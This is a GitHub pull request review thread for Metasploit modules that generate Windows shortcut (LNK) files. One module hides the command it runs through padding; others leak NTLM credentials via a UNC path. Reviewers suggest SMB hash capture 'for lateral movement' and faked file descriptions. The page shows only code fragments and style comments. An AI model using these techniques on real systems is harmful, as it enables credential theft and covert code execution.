Issue: #20223 #20518
Issue: #20223 #20518
Conversation
Added Metasploit Auxiliary Module: [x] Environment Variable Data Block NTLM Leak [x] Icon Environment Data Block NTLM Leak [x] Special Folder Data Block NTLM Leak [x] Windows LNK Padding Ref: https://github.com/nafiez/DataBlockNTLMLeak/tree/main
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
|
|
||
| def initialize(info = {}) | ||
| super(update_info(info, | ||
| 'Name' => 'ZDI-CAN-25373 - Windows Shortcut (LNK) Padding', |
There was a problem hiding this comment.
Can you move ZDI ID to references?
| 'Name' => 'ZDI-CAN-25373 - Windows Shortcut (LNK) Padding', | |
| 'Name' => 'Windows Shortcut (LNK) Padding', |
| register_options([ | ||
| OptString.new('FILENAME', [ true, 'The LNK filename to generate', 'poc.lnk' ]), | ||
| OptString.new('COMMAND', [ true, 'Command to execute', 'C:\\Windows\\System32\\calc.exe' ]), | ||
| OptString.new('DESCRIPTION', [ true, 'LNK file description', 'testing purpose' ]), |
There was a problem hiding this comment.
I think it might be better to make this option not mandatory and then add random description if the user does not provide description input. There's Faker module for that, which can add some pretty reasonable descriptions.
| OptString.new('FILENAME', [ true, 'The LNK filename to generate', 'poc.lnk' ]), | ||
| OptString.new('COMMAND', [ true, 'Command to execute', 'C:\\Windows\\System32\\calc.exe' ]), | ||
| OptString.new('DESCRIPTION', [ true, 'LNK file description', 'testing purpose' ]), | ||
| OptString.new('ICON_PATH', [ true, 'Icon path for the LNK file', 'your_icon_path\\WindowsBackup.ico' ]), |
There was a problem hiding this comment.
Also same thing as for DESCRIPTION.
| unicode_buffer = unicode_buffer.ljust(520, "\x00".force_encoding('UTF-16LE'))[0, 520].force_encoding('ASCII-8BIT') | ||
| data << unicode_buffer | ||
|
|
||
| return data |
There was a problem hiding this comment.
| return data | |
| data |
|
|
||
| register_options([ | ||
| OptString.new('FILENAME', [true, 'The LNK file name', 'msf.lnk']), | ||
| OptString.new('UNC_PATH', [true, 'The UNC path for credentials capture (e.g., \\\\192.168.1.1\\share)', '\\\\192.168.1.1\\share']), |
There was a problem hiding this comment.
I think you can spawn SMB server from Metasploit, then you can capture credentials from your module. You can use following imports:
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::Remote::SMB::Server::HashCapture
It might be more helpful with lateral movement.
| end | ||
|
|
||
| def generate_item_id(data) | ||
| return [data.length + 2].pack('S') + data |
There was a problem hiding this comment.
| return [data.length + 2].pack('S') + data | |
| [data.length + 2].pack('S') + data |
| bin_data << name_utf16 | ||
| bin_data << "\x00\x00".force_encoding('ASCII-8BIT') # comment | ||
|
|
||
| return bin_data |
There was a problem hiding this comment.
| return bin_data | |
| bin_data |
| idlist << "\x00\x00".force_encoding('ASCII-8BIT') | ||
|
|
||
| # Full IDList with size | ||
| return [idlist.length].pack('S') + idlist |
There was a problem hiding this comment.
| return [idlist.length].pack('S') + idlist | |
| [idlist.length].pack('S') + idlist |
| extra << [0x28].pack('L') # Offset (4 bytes) | ||
| extra << [0x00].pack('L') # TERMINAL_BLOCK (4 bytes) | ||
|
|
||
| return extra |
There was a problem hiding this comment.
| return extra | |
| extra |
| lnk_data << generate_linktarget_idlist(path, name) | ||
| lnk_data << generate_extra_data | ||
|
|
||
| return lnk_data |
There was a problem hiding this comment.
| return lnk_data | |
| lnk_data |
Sure I will get started with the code changes and then move on to the documentation |
Added Metasploit Auxiliary Module:
[x] Environment Variable Data Block NTLM Leak
[x] Icon Environment Data Block NTLM Leak
[x] Special Folder Data Block NTLM Leak
[x] Windows LNK Padding
Ref:
https://github.com/nafiez/DataBlockNTLMLeak/tree/main
Issue: #20223